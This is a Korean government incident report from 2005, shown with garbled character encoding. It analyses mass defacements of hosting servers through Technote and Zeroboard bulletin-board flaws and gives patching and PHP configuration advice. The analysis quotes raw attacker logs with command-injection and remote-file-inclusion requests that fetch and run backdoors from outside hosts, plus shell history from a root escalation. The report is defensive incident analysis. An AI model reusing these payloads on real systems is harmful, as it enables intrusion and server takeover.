Home | Data Center | Contact US | Login

Á¦¸ñ PHP À¥ °Ô½ÃÆÇ °ü·Ã ħÇØ»ç°í ºÐ¼® ¹× º¸¾È´ëÃ¥
÷ºÎÆÄÀÏ IN2005001.pdf ÀÛ¼ºÀÏ 2005-04-19 14:44:27
PHP À¥ °Ô½ÃÆÇ °ü·Ã ħÇØ»ç°í ºÐ¼® ¹× º¸¾È´ëÃ¥ 2005. 1. 4
ÀÎÅͳÝħÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ (KISC)

[¸ñ Â÷]
1. °³¿ä
2. »ç°í»ç·Ê ¹× ºÐ¼®
    °¡. Å×Å©³ëÆ® °Ô½ÃÆÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ Ä§ÇØ»ç°í »ç·Ê 
    ³ª. Á¦·Îº¸µå °Ô½ÃÆÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ Ä§ÇØ»ç°í »ç·Ê
3. º¸¾È´ëÃ¥
    °¡. °ø°³ °Ô½ÃÆÇÀÇ Ãë¾àÁ¡ º¸¾È´ëÃ¥
    ³ª. PHP Ãë¾àÁ¡ º¸¾È´ëÃ¥
4. °á·Ð
____________________________________________________________________________________

1. °³¿ä

o 04³â 12¿ù 28ÀϺÎÅÍ 05³â 1¿ù 4ÀϱîÁöÀÇ ±â°£µ¿¾È ¹«·Á 2,300¿©°³ÀÇȨÆäÀÌÁö°¡ º¯Á¶µÇ´Â ÇÇÇØ°¡ ¹ß»ýÇߴµ¥, ÀÌ´Â ÇϳªÀÇ ¼­¹ö¿¡ ´Ù¼öÀÇÀ¥»çÀÌÆ®°¡ ±¸¼ºµÇ¾î ÀÖ´Â À¥ È£½ºÆà ¼­¹öÀÇ ÇØÅ·À¸·Î ÀÎÇØ ÇϳªÀÇ ¼­¹ö°¡ ÇØÅ· ´çÇÔÀ¸·Î¼­ ´Ù¼öÀÇ »çÀÌÆ®°¡ º¯Á¶µÇ´Â °æ¿ì°¡ ¸¹¾Ò±â ¶§¹®ÀÌ´Ù.

o ÀÌ·¯ÇÑ À¥È£½ºÆà ¼­¹ö¿¡´Â ¼ö½Ê, ¼ö¹é°³ÀÇ È¨ÆäÀÌÁö°¡ Á¸ÀçÇÏ¿©, ÀÌÁßÇϳªÀÇ È¨ÆäÀÌÁö¿¡ ¹®Á¦Á¡ÀÌ Á¸ÀçÇÒ °æ¿ì, ¼­¹ö¿¡¼­ ¿î¿µµÇ°í ÀÖ´ÂÀüü ȨÆäÀÌÁö°¡ º¯Á¶ ¶Ç´Â Æı«µÇ´Â »çÅ°¡ ¹ß»ýÇÏ°Ô µÈ´Ù.

o ÀÌ¿¡ º» ¹®¼­¿¡¼­´Â ÃÖ±Ù ¹ß»ýÇÑ ÇØÅ·»ç°í »ç·ÊºÐ¼®À» ÅëÇØ ÇÇÇØ¿øÀÎÀ» ÆľÇÇÏ°í, ȨÆäÀÌÁöÀÇ ¾ÈÀüÇÑ ¿î¿µ°ú º¸¾È´ëÃ¥, ±×¸®°í À¥È£½ºÆà ¼­¹öÀÇ ±âº»ÀûÀÎ ¿î¿µ¹æ¾È¿¡ ´ëÇØ ¾Ë¾Æº¸µµ·Ï ÇÑ´Ù.

2. »ç°í»ç·Ê ¹× ºÐ¼®

1) Å×Å©³ëÆ® °Ô½ÃÆÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ Ä§ÇØ»ç°í »ç·Ê

04³â 10¿ù 28ÀÏ, 17°³ »çÀÌÆ®¿¡ ´ëÇØ À¥È£½ºÆà ¼­ºñ½º¸¦ Á¦°øÇÏ°í ÀÖ´ø ±¹³»¸®´ª½º ¼­¹ö°¡ ºê¶óÁú ÇØÄ¿±×·ì¿¡ ÀÇÇØ È¨ÆäÀÌÁö°¡ º¯Á¶µÇ´Â »ç°í°¡ ¹ß»ýÇÏ¿´´Ù.

ȨÆäÀÌÁö¸¦ º¯Á¶½ÃŲ ¡¸int3rc3pt0r¡¹¶ó´Â ÇØÄ¿±×·ìÀº Çѱ¹ÀÇ ¼­¹ö¸¦ ´ë»óÀ¸·Î ¸¹Àº »ç°í¸¦ ÀÏÀ¸Å°°í ÀÖ´Â ±×·ìÀ¸·Î¼­ 04³â 10¿ù ÇÑ´Þ µ¿¾È¿¡ 200¿©°³ÀÇ ±¹³» ȨÆäÀÌÁö¸¦ º¯Á¶ÇÑ °ÍÀ¸·Î È®ÀεǾú´Ù.


<±×¸² 2> ±¹³» »çÀÌÆ® À¥º¯Á¶ È­¸é

ÇØ´ç ¼­¹öÀÇ ºÐ¼®°á°ú, À¥È£½ºÆà °í°´ÀÌ ¿î¿µÁßÀÎ ÇÑ »çÀÌÆ®¿¡ ¼³Ä¡µÈ Å×Å©³ëÆ®ÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇØ ½Ã½ºÅÛ¿¡ ħÀÔ, ȨÆäÀÌÁö¸¦ º¯Á¶ÇÑ °ÍÀ¸·Î È®ÀεǾú´Ù.

º» »ç°í´Â, Å×Å©³ëÆ® °Ô½ÃÆÇ¿¡ ÆÄÀÏÀ» ¾÷·Îµå ȤÀº ´Ù¿î·Îµå ÇÒ ¶§ »ç¿ëµÇ´Â CGI ÇÁ·Î±×·¥¿¡¼­ °ü·Ã URLÀ» üũÇÏÁö ¾Ê¾Æ ½Ã½ºÅÛ ¸í·ÉÀÌ ½ÇÇà µÉ ¼ö ÀÖ´Â Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿´´Ù. ¸ÕÀú ±¹¿ÜÀÇ »çÀÌÆ®¿¡ ÀúÀå ½ÃŲ ¹éµµ¾î¿ë ÇÁ·Î±×·¥À» ÇØ´ç ÇÇÇؽýºÅÛ¿¡ ¾÷·Îµå ÇÏ¿©, ¾÷·Îµå ÇÑ ¹éµµ¾î ÇÁ·Î±×·¥ÀÇ ½ÇÇàÀ» À§ÇØ ÇØ´ç ¹éµµ¾î ÆÄÀÏ¿¡ ½ÇÇà±ÇÇÑÀ» ºÎ¿©ÇÑ ÈÄ ½ÇÇàÇÏ¿© ÇÇÇؽýºÅÛ¿¡ ¹éµµ¾î¸¦ ¿ÀÇ ÇÏ¿´´Ù.
 

201.9.xxx.xxx - - [28/Oct/2004:10:59:45 +0900] "GET
/cgi/b/t/board/main.cgi?board=FREE_BOARD&command=xxxx_xxxx&xxxxxx=|wget%20-P%20/tm
p%20http://xxx.xxxxx.com/xxxxx/xxxxx/rootedoor| HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible;
MSIE 5.0; Windows 98; DigExt)"
¦¦ ¹éµµ¾îÆÄÀϾ÷·Îµå
 
201.9.xxx.xxx - - [28/Oct/2004:11:00:10 +0900] "GET
/cgi/b/t/board/main.cgi?board=FREE_BOARD&command=xxxx_xxxx&xxxxxx=|cd%20..;cd%20..;cd
%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20
..;cd%20/tmp;chmod%20777%20rootedoor;./rootedoor| HTTP/1.1" 200 5 "-" "Mozilla/4.0
(compatible; MSIE 5.0; Windows 98; DigExt)"
¦¦ ¹éµµ¾îÆÄÀϱÇÇѺ¯°æ¹×½ÇÇà
 
201.9.xxx.xxx - - [28/Oct/2004:11:00:20 +0900] "GET
/cgi/b/t/board/main.cgi?board=FREE_BOARD&command=xxxx_xxxx&xxxxxx=|cd%20..;cd%20..;cd
%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20
..;cd%20/tmp;ls| HTTP/1.1" 200 3514 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
DigExt)"
¦¦ ¹éµµ¾îÆÄÀϼ³Ä¡¿©ºÎÈ®ÀÎ
 
201.9.xxx.xxx - - [28/Oct/2004:11:00:53 +0900] "GET
/cgi/b/t/board/main.cgi?board=FREE_BOARD&command=xxxx_xxxx&xxxxxx=|wget%20-P%20/var
/tmp/%20http://xxx.xxx.com/xxxxx/xxxxx/rootedoor| HTTP/1.1" 200 5 "-" "Mozilla/4.0
(compatible; MSIE 5.0; Windows 98; DigExt)"
¦¦ ¹éµµ¾îÆÄÀϾ÷·ÎµåÀç½Ãµµ
 
201.9.xxx.xxx - - [28/Oct/2004:11:01:17 +0900] "GET
/cgi/b/t/board/main.cgi?board=FREE_BOARD&command=xxxx_xxxx&xxxxxx=|cd%20..;cd%20..;cd
%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20
/var/tmp/;chmod%20777%20rootedoor;./rootedoor| HTTP/1.1" 200 69 "-" "Mozilla/4.0
(compatible; MSIE 5.0; Windows 98; DigExt)"
¦¦ ¹éµµ¾îÆÄÀϱÇÇѺ¯°æ¹×½ÇÇà

±× ÈÄ, »ý¼ºÇÑ ¹éµµ¾î¸¦ ÅëÇØ ÇÇÇØ ½Ã½ºÅÛ¿¡ Á¢¼ÓÇÑ ÈÄ root ±ÇÇÑ È¹µæÀ» À§ÇØ wgetÀ» »ç¿ëÇØ ·ÎÄà Ãë¾àÁ¡ °ø°ÝÇÁ·Î±×·¥À» ´Ù¿î·Îµå ¹× ½ÇÇàÇÏ¿© root ±ÇÇÑÀ» ȹµæÇÏ¿´´Ù.
À¥·Î±× ºÎºÐ°ú ½Ã½ºÅÛÀÇ last ·Î±×¸¦ ÅëÇØ Ä§ÀÔÇÑ IP´Â 201.9.xxx.xxxÀ¸·Î È®ÀεǸç, Whois Á¶È¸¸¦ ÅëÇØ ºê¶óÁú IPÀÓÀ» ¾Ë ¼ö ÀÖ¾ú´Ù.
 
[root@kormb tmp]# ls -alct
total 468
drwxr-xr-x 19 root root 4096 Oct 29 12:38 ..
drwxrwxrwt 2 root root 4096 Oct 29 04:05 .
-rw------- 1 www www 234 Oct 28 12:34 .bash_history
-rwxrwxrwx 1 www www 446714 Oct 28 11:04 brk2
¦¦ ·ÎÄÃÃë¾àÁ¡°ø°ÝÅø-rwxrwxrwx 1 www www 10927 Oct 28 11:01 rootedoor
¦¦ ¹éµµ¾îÇÁ·Î±×·¥[root@kormb tmp]# more .bash_history
w
cd tmp
wget
ls
uname -a
locate httpd.conf
locate httpd.conf
find / -name httpd.conf
wget http://www.xxxxxxx.com.br/brk2
chmod 777 brk2.htm
./brk2.htm
chmod 777 brk2
./brk2
cp brk2 /var/tmp
cd ..
cd ..
cd /var/tmp
./brk2

bash-2.05a$ id
uid=502(abcd) gid=502(abcd) groups=502(abcd) ¡æ ÀÏ¹Ý »ç¿ëÀÚ ±ÇÇÑ Á¢¼Ó»óÅÂ
bash-2.05a$ cd /var/tmp
bash-2.05a$ ./brk2
id
sh-2.05a# id
uid=0(root) gid=0(root) ¡æ ÇØÅ·Åø ½ÇÇàÈÄ ·çÆ®±ÇÇÑÀ¸·Î º¯°æµÊ
sh-2.05a#

inetnum: 201.0/12
status: allocated
owner: Comite Gestor da Internet no Brasil
ownerid: BR-CGIN-LACNIC
responsible: Frederico A C Neves
address: Av. das Naes Unidas, 11541, 7¡Æ andar
address: 04578-000 - San Paulo - SP
country: BR
phone: +55 11 9119-0304 []
owner-c: CGB
tech-c: CGB


º» »ç·Ê´Â ½Ã½ºÅÛ °ü¸®ÀÚ°¡ ÆÐÄ¡ ÀÛ¾÷µîÀ» ÅëÇØ ½Ã½ºÅÛÀ» Á¦´ë·Î °ü¸®ÇÏ´õ¶óµµ Ãë¾àÇÑ °Ô½ÃÆÇÀ» ¼³Ä¡?¿î¿µÇÏ´Â µî ÀÏ¹Ý »ç¿ëÀÚÀÇ ºÎÁÖÀÇ°¡ ÇØÅ·ÇÇÇظ¦ ÃÊ·¡ÇÒ ¼ö ÀÖ´Ù´Â °ÍÀ» º¸¿©ÁØ´Ù.

2) Á¦·Îº¸µå °Ô½ÃÆÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ Ä§ÇØ»ç°í »ç·Ê
2005³â 1¿ù 2ÀÏ, ¾à 1200¿©°³¿¡ ´ÞÇÏ´Â »çÀÌÆ®°¡ ¿î¿µÁßÀÎ ±¹³»ÀÇ À¥ È£½ºÆà ¼­¹ö°¡ ºê¶óÁú ÇØÄ¿±×·ì¿¡ ÀÇÇÏ¿© ȨÆäÀÌÁö°¡ º¯Á¶µÇ´Â »ç°í°¡ ¹ß»ýÇÏ¿´´Ù.

ºÐ¼®°á°ú, ÇØ´ç ¼­¹ö´Â ÇöÀç Ãë¾àÁ¡ÀÌ Á¸ÀçÇÏ´Â °ÍÀ¸·Î ¾Ë·ÁÁø PHP 4.3¹öÀü°ú Á¦·Îº¸µå 4.1 pl4¹öÀüÀÌ »ç¿ëµÇ°í ÀÖ¾ú´Ù. ƯÈ÷ °ø°ÝÀ» ÀÎÁöÇϱâ ÀÌÀü±îÁö php.ini ÆÄÀÏÀÇ "allow_url_fopen = On" ¹×register_globals = On À¸·Î ¼³Á¤µÇ¾î ÀÖ¾î, PHP ¼³Á¤ ¹× Á¦·Îº¸µå Ãë¾àÁ¡ ¹®Á¦·Î ÀÎÇØ ÇÇÇØ°¡ ¹ß»ýÇÑ °ÍÀ¸·Î ÃßÁ¤µÇ¾ú´Ù.

À¥·Î±× ºÐ¼®À» ÅëÇØ ÃÖÃÊ °ø°ÝÀº 2005³â 1¿ù 2ÀÏ 12:56:10¿¡ 200.193.xxx.xxx(ºê¶óÁú)·ÎºÎÅÍ ½ÃµµµÈ °ÍÀÌ È®ÀεǾúÀ¸¸ç, Á¦·Îº¸µåÀÇ Ãë¾àÁ¡ Áß ÇϳªÀÎ ¿ø°Ý »çÀÌÆ®ÀÇ PHP ÆÄÀÏÀ» ·ÎÄÿ¡¼­ ±¸µ¿ ½Ãų ¼ö ÀÖ´Â Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ÍÀ» ¾Ë ¼ö ÀÖ¾ú´Ù.
200.193.xxx.xxx - - [02/Jan/2005:12:56:10 +0900] "GET
/bbs/include/xxxxx.php?dir=http://xxx.xxxx.xxx/yc/xxx.xxx?&xxx=id;%20uname%20-a;%20pwd
HTTP/1.1" 200 8298
200.193.xxx.xxx - - [02/Jan/2005:13:00:18 +0900] "GET
/bbs/include/xxxxx.php?dir=http://xxx.xxxx.xxx/yc/xxx.xxx?&xxx=cd%20/tmp;%20wget%20http://xxx.
xxx.org/xxx/bd;%20chmod%20777%20bd;%20./bd HTTP/1.1" 200 8284
200.193.xxx.xxx - - [02/Jan/2005:13:02:33 +0900] "GET
/bbs/include/xxxxx.php?dir=http://xxx.xxxx.xxx/yc/xxx.xxx?&xxx=cd%20/etc/httpd/conf;%20cat%20ht
tpd.conf%20|%20grep%20ServerName HTTP/1.1" 200 8438
200.193.xxx.xxx - - [02/Jan/2005:13:03:07 +0900] "GET
/bbs/include/xxxxx.php?dir=http://xxx.xxxx.xxx/yc/xxx.xxx?&xxx=cd%20/etc/httpd/conf;%20cat%20ht
tpd.conf HTTP/1.1" 200 60320

´ÙÀ½Àº netstat ¸í·ÉÀ» ÀÌ¿ëÇØ TCP 1666¹ø Æ÷Æ®ÀÇ Á¢¼Ó»óŸ¦ È®ÀÎÇÑ ³»¿ëÀÌ´Ù. ÇØ´ç Æ÷Æ®´Â netstat ¸í·ÉÀ» ÅëÇØ /tmp µð·ºÅ丮¿¡ À§Ä¡ÇÑ bd¶ó´Â ÆÄÀÏÀÌ ¿ÀÇÂÇÑ °ÍÀÓÀ» È®ÀÎÇÏ¿´À¸³ª, ½ÇÇà ÈÄ »èÁ¦µÈ °ÍÀ» ¾Ë ¼ö ÀÖ´Ù.
 
[root@blue log]# netstat -na |grep 1666
tcp 0 0 0.0.0.0:1666 0.0.0.0:* LISTEN
tcp 5 0 211.239.xxx.xxx:1666 200.193.xxx.xxx:32813 CLOSE_WAIT
tcp 2 0 211.239.xxx.xxx:1666 200.193.xxx.xxx:32803 ESTABLISHED
tcp 15 0 211.239.xxx.xxx:1666 201.1.xxx.xxx:2751 CLOSE_WAIT
tcp 7 0 211.239.xxx.xxx:1666 200.151.xxx.xxx:32799 CLOSE_WAIT
--------------------------------------------------------------------
inetnum: 200.128/9
status: allocated
owner: Comite Gestor da Internet no Brasil
ownerid: BR-CGIN-LACNIC
responsible: Frederico A C Neves
address: Av. das Nações Unidas, 11541, 7?andar
address: 04578-000 - S? Paulo - SP
country: BR




¹éµµ¾î ÇÁ·Î±×·¥ÀÎ bd¸¦ ÀÌ¿ëÇØ ½Ã½ºÅÛ¿¡ Á¢¼ÓÇÑ ÈÄ ½©À» È®º¸ÇÏ°í,ÀÌÈÄ root ±ÇÇÑÀ» ȹµæÇÑ °ÍÀ¸·Î º¸ÀδÙ. ¹éµµ¾î ÇÁ·Î±×·¥ÀÎ bd´Â 15½Ã°æÀÌÈÄ ¼³Ä¡µÇ¾úÀ¸¸ç, CPUÀÇ 95%¸¦ Â÷ÁöÇÏ°í ÀÖ¾ú´Ù.
apache 3382 79.3 0.0 1440 312 ? R 13:42 488:55 ./bd
apache 3383 0.0 0.1 2168 892 ttyp0 S 13:42 0:00 sh -i
root 3482 0.0 0.1 2200 892 ttyp0 S 13:44 0:06 /bin/sh



rcµî ºÎÆà µð·ºÅ丮¿Í ±âŸ À§Ä¡¿¡¼­ ´õ ÀÌ»óÀÇ ¾Ç¼º ÇÁ·Î±×·¥À» ¹ß°ßÇÒ ¼ö´Â ¾ø¾ú´Ù.

3. º¸¾È´ëÃ¥

°¡. °ø°³°Ô½ÃÆÇÀÇ Ãë¾àÁ¡ ´ëÃ¥

1) Å×Å©³ëÆ® Ãë¾àÁ¡ º¸¾È´ëÃ¥

o 2004³â 10¿ù 14ÀÏ ÀÌÀü¹öÀü »ç¿ë ½Ã Å×Å©³ëÆ® ȨÆäÀÌÁö¿¡¼­ Á¦°øµÇ´Â ÆÐÄ¡¹öÁ¯À» ¼³Ä¡Çϰųª °ü·Ã¼³Á¤À» º¯°æÇÑ´Ù.

o ¼³Á¤º¯°æ ¹æ¹ý
   - technote/library/Lib-5.cgi¿¡¼­ ¼Ò½º »ó´Ü ºÎºÐ
     ¡æ exit if($FORM'filename'=~/\;|\ ÄÚµå Ãß°¡

   - technote/print.cgi¿¡¼­ ¼Ò½º »ó´Ü 29~30 ¹ø ¶óÀο¡ ÀÖ´Â
      &parse; À§ ÄÚµåÀÇ ¹Ù·Î ¾Æ·¡ ¶óÀο¡
     ¡æ exit if($FORM'img'=~/\;|\ ÄÚµå Ãß°¡

¡Ø °ü·Ã URL
: http://www.technote.co.kr/cgi-bin/techtop/technote2/read.cgi?board=notice&y_number=17&nnew=1

2) Á¦·Îº¸µå Ãë¾àÁ¡ º¸¾È´ëÃ¥

o Ãë¾àÇÑ ¹öÀüÀÇ Á¦·Îº¸µå¸¦ »ç¿ëÇÏ°í ÀÖ°í, php.iniÀÇ ¼³Á¤¿¡¼­ allow_url_fopenÀÌ onÀ¸·Î ¼³Á¤µÇ¾î ÀÖÀ» °æ¿ì, ¿ÜºÎ PHP ¼Ò½º¸¦ ÅëÇØ ½Ã½ºÅÛ ¸í·É¾î°¡ ½ÇÇàµÉ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.
o Á¦·Îº¸µå 4.1 pl4ÀÌÇÏ ¹öÀü »ç¿ë ½Ã 4.1 pl5·Î ¾÷±×·¹À̵å ÇØ¾ß Çϸç, allow_url_fopenÀÇ ¼³Á¤À» Off·Î º¯°æÇØ¾ß ÇÑ´Ù. ÆÐÄ¡ÆÄÀÏÀº ±âÁ¸ »ç¿ëÀÚ¸¦ À§ÇØ ÀϺΠÆÄÀÏÀÌ º¯°æµÈ ¹öÁ¯°ú Ç® ¹öÁ¯ÀÇ 2°¡Áö°¡ ÀÖ´Ù.

¡Ø ÆÐÄ¡ ´Ù¿î·Îµå URL
: http://www.nzeo.com/bbs/zboard.php?id=main_notice&no=176

3) ±âŸ °ø°³°Ô½ÃÆÇ Ãë¾àÁ¡ º¸¾È´ëÃ¥

o ±×´©º¸µå Ãë¾àÁ¡ º¸¾È´ëÃ¥
   - ±×´©º¸µå 3.39ÀÌÇÏ ¹öÀü »ç¿ë ½Ã 3.41 ¹öÀüÀ¸·Î ¾÷±×·¹À̵å ÇÑ´Ù.

¡Ø ÆÐÄ¡ ´Ù¿î·Îµå URL
: http://sir.co.kr/?doc=bbs/gnuboard.php&bo_table=pds&page=1&wr_id=1910


o phpBB Ãë¾àÁ¡ º¸¾È´ëÃ¥
   - phpBBÀÇ ±¸¼ºÆÄÀÏ Áß viewtopic.phpÀÇ highlight ÆĶó¹ÌÅÍ·Î Àü´ÞµÇ´Â ºÎºÐÀÇ ¹®Á¦Á¡À¸·Î ÀÎÇØ ÀÓÀÇÀÇ ½Ã½ºÅÛ ¸í·É¾î°¡ ½ÇÇà
µÉ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.
   - phpBB 2.0.10ÀÌÇÏ ¹öÀü »ç¿ë ½Ã 2.0.11ÀÌ»óÀÇ ¹öÀüÀ¸·Î ¾÷±×·¹À̵å ÇÑ´Ù.

¡Ø ÆÐÄ¡ ´Ù¿î·Îµå URL
: http://www.phpbb.com/downloads.php

o Korweblog Ãë¾àÁ¡ º¸¾È´ëÃ¥

- ´ÙÀ½°ú °°ÀÌ »èÁ¦ ÀÛ¾÷°ú ¼³Á¤ º¯°æÇÑ´Ù.
   . ¼³Ä¡ ÈÄ »ç¿ëÇÏÁö ¾Ê´Â install °ü·ÃÆÄÀÏÀº »èÁ¦
   . php.iniÀÇ allow_url_fopenÀº Off·Î ¼³Á¤
- Á¦ÀÛÀÚ°¡ Á¦½ÃÇÑ ÀÓ½ÃÇØ°áÃ¥À» Àû¿ëÇÑ´Ù.
   . korweblog 1.6.2-cvs ¹× ÀÌÀü ¹öÀü »ç¿ë ½Ã /install/index.phpÀÇ ³»¿ëÀ» ´ÙÀ½°ú °°ÀÌ ¼öÁ¤ÇÑ´Ù.
--- index_1_6_1.php Mon Dec 27 17:31:50 2004<BR>+++ index.php Mon Dec 27 17:40:51 2004<BR>@@ -18,7 +18,10 @@<BR>$G_VER = "1.6.1";<BR>-if (!empty($lng)) include("lang/$lng" . ".php");<BR>+if (!empty($lng)) {<BR>+ if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean";<BR>+ include("lang/$lng" . ".php");<BR>+}<BR> $sql_form ="<br> <TD colSpan=2><B>". _SQL_INPUT ."</B></TD></TD>

³ª.PHP Ãë¾àÁ¡ º¸¾È´ëÃ¥

php·Î Á¦ÀÛµÈ °Ô½ÃÆÇÀÇ Ãë¾àÁ¡ÀÌ Áö¼ÓÀûÀ¸·Î ¹ß°ßµÇ°í ÀÖ¾î °ü·Ã°Ô½ÃÆÇ »ç¿ë ½Ã ÇØ´ç °Ô½ÃÆÇÀÇ Ãë¾àÁ¡ Á¸Àç¿©ºÎÀÇ È®Àΰú ´õºÒ¾îphpÀÇ ÆÐÄ¡ ¹× ¼³Á¤¿¡µµ ÁÖÀǸ¦ ±â¿ï¿©¾ß ÇÑ´Ù.

1) º¸¾ÈÆÐÄ¡ ¼³Ä¡

o PHP 4.3.9¸¦ Æ÷ÇÔÇÑ ÀÌÇÏ ¹öÀüÀ̳ª PHP 5.0.2ÀÌÇÏ ¹öÀü »ç¿ë ½ÃPHP 4.3.10 À̳ª PHP 5.0.3À¸·Î ¾÷±×·¹À̵åÇÑ´Ù.

¡Ø º¸¾È±Ç°í¹® ¹× ÂüÁ¶»çÀÌÆ®
http://secunia.com/advisories/13481/
http://www.php.net/release_4_3_10.php
¡Ø ÆÐÄ¡ ´Ù¿î·Îµå URL
http://www.php.net/downloads.php

2) ȯ°æ¼³Á¤ º¯°æ

o ¿ÜºÎÀÇ È¨ÆäÀÌÁö¸¦ ÇöÀçÀÇ »çÀÌÆ®¿¡¼­ ½ÇÇàÇÒ ÇÊ¿ä°¡ ¾ø´Ù¸é allow_url_fopenÀº Off·Î ¼³Á¤ÇÏ¿© URLÀÌ ÆÄÀÏó·³ »ç¿ëµÇÁö ¾Êµµ·Ï ÇÑ´Ù.

o À¥¼­¹ö¸¦ ÅëÇØ Àü´Þ¹Þ´Â °ªµéÀÌ ±Û·Î¹ú º¯¼ö·Î »ç¿ëµÇµµ·Ï ¼³Á¤ÇÏ´Â ºÎºÐÀÎ register_globalsÀÇ °æ¿ì º¸¾È»ó Off·Î ¼³Á¤ÇÏ´Â °ÍÀÌ ÁÁÀ¸³ª Off·Î ¼³Á¤µÇ¾î ÀÖÀ» °æ¿ì ƯÁ¤ °Ô½ÃÆÇ¿¡¼­ µ¿ÀÛ¿¡ ¹®
Á¦°¡ »ý±â¹Ç·Î »ç¿ëÁßÀÎ °Ô½ÃÆÇ ÇÁ·Î±×·¥¿¡ ¸ÂÃç ¼³Á¤À» º¯°æÇÑ´Ù.

o ½ºÅ©¸³Æ® ½ÇÇà Áß ¹ß»ýµÇ´Â ¿¡·¯´Â ¿ÜºÎÀÇ Ä§ÀÔÀÚ¿¡°Ô À¯¿ëÇÑ Á¤º¸°¡ µÉ ¼ö ÀÖ´Ù. display_errors¸¦ Off·Î ¼³Á¤ÇÏ¿© ÀÌ·¯ÇÑ ¿¡·¯¸Þ½ÃÁö°¡ Á¢¼ÓÀÚ¿¡°Ô º¸¿©ÁöÁö ¾Ê°Ô ÇÒ ¼ö ÀÖ´Ù. ¶Ç, display_errors¸¦ Off·Î ¼³Á¤ÇÏ´õ¶óµµ PHP ½ÃÀÛ½ÃÀÇ ¿¡·¯´Â Ç¥½Ã°¡ µÇ´Âµ¥, ½ÃÀÛ½ÃÀÇ ¿¡·¯¸¦ Ç¥½ÃÇÏÁö ¾Ê´Â °ÍÀº display_startup_error¸¦ Off·Î ¼³Á¤ÇÏ¿© ÇØ°áÇÒ ¼ö ÀÖ´Ù.

o À§ÀÇ display_errors ¼³Á¤°ú ÇÔ²² log_errors¸¦ OnÀ¸·Î ¼³Á¤ÇÏ¿© ½ºÅ©¸³Æ® ¿¡·¯ ¸Þ½ÃÁö°¡ ¼­¹öÀÇ ¿¡·¯ ·Î±×ÆÄÀÏ¿¡ ±â·ÏµÇµµ·Ï ¼³Á¤ ÇÒ ¼ö ÀÖ´Ù. ¶Ç, ¿¡·¯·Î±×ÀÇ ±â·ÏÁ¤µµ´Â error_reportingÀÇ ¼³Á¤À» ÅëÇØ ÁöÁ¤ÇÒ ¼ö ÀÖ´Ù.

4. °á·Ð

o ÃÖ±ÙÀÇ ÇØÅ·»ç°íÀÇ ´ëºÎºÐÀº À¥ ¾îÇø®ÄÉÀ̼ÇÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ »ç°í°¡ ´ëºÎºÐÀ» Â÷ÁöÇÏ°í ÀÖ¾î ¼­¹öÀÇ Ãë¾àÁ¡ ÆÐÄ¡³ª Á¢±ÙÁ¦ÇÑ µîÀÇ ±âº»ÀûÀÎ º¸¾È¼³Á¤ ÀÌ¿Ü¿¡µµ À¥È£½ºÆà °í°´ÀÌ ¿î¿µÁßÀΠȨÆäÀÌÁöÀÇ º¸¾È¿¡ ´ëÇؼ­µµ ÁÖÀǸ¦ ±â¿ï¿©¾ß ÇÑ´Ù.

o ƯÈ÷, È£½ºÆà ¾÷ü¿¡¼­ Á÷Á¢ ¼³Á¤Çϰųª Á¦ÀÛÇÑ °Ô½ÃÆÇ ÇÁ·Î±×·¥ À» Á¦°øÇÏ¿© °í°´ÀÌ ÀÓÀÇÀÇ °Ô½ÃÆÇ ÇÁ·Î±×·¥À» »ç¿ëÇÏÁö ¸øÇϵµ·Ï Á¦ÇÑÇÏ°í, º°µµÀÇ °Ô½ÃÆÇ ¼­¹ö¸¦ ¿î¿µÇÏ¿© °Ô½ÃÆÇÀ» ÀÌ¿ëÇÑ ÇØÅ· »ç°í ½Ã¿¡µµ ȨÆäÀÌÁöÀÇ º¯Á¶±îÁö´Â ¹ß»ýÇÏÁö ¾Êµµ·Ï ÇÏ¿©¾ß ÇÑ´Ù.

o À¥È£½ºÆà ¼­¹öÀÇ °æ¿ì ¸¹Àº ¾çÀÇ ·Î±×°¡ »ý¼ºµÇ¾î ·Î±×ÀÇ °ü¸®¿¡ ¾î·Á¿òÀÌ µû¸£Áö¸¸, »ç°í Á¶»çºÐ¼®ÀÌ ¿øÈ°È÷ ÁøÇà µÉ ¼ö ÀÖµµ·Ï ·Î±×¼­¹ö¸¦ ¿î¿µÇÏ¿©¾ß ÇÑ´Ù.

[ÀÚ·á: Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø(KISA)]
  ¾Ç¼º ÇÁ·Î±×·¥ À¯Æ÷·Î ÀÌ¿ëµÈ ±¹³»»ç°í½Ã½ºÅÛ ºÐ¼®
  ¸ÞÀÏÇÊÅ͸µÀ» ÅëÇÑ E-Mail º¸¾È





ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ
ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ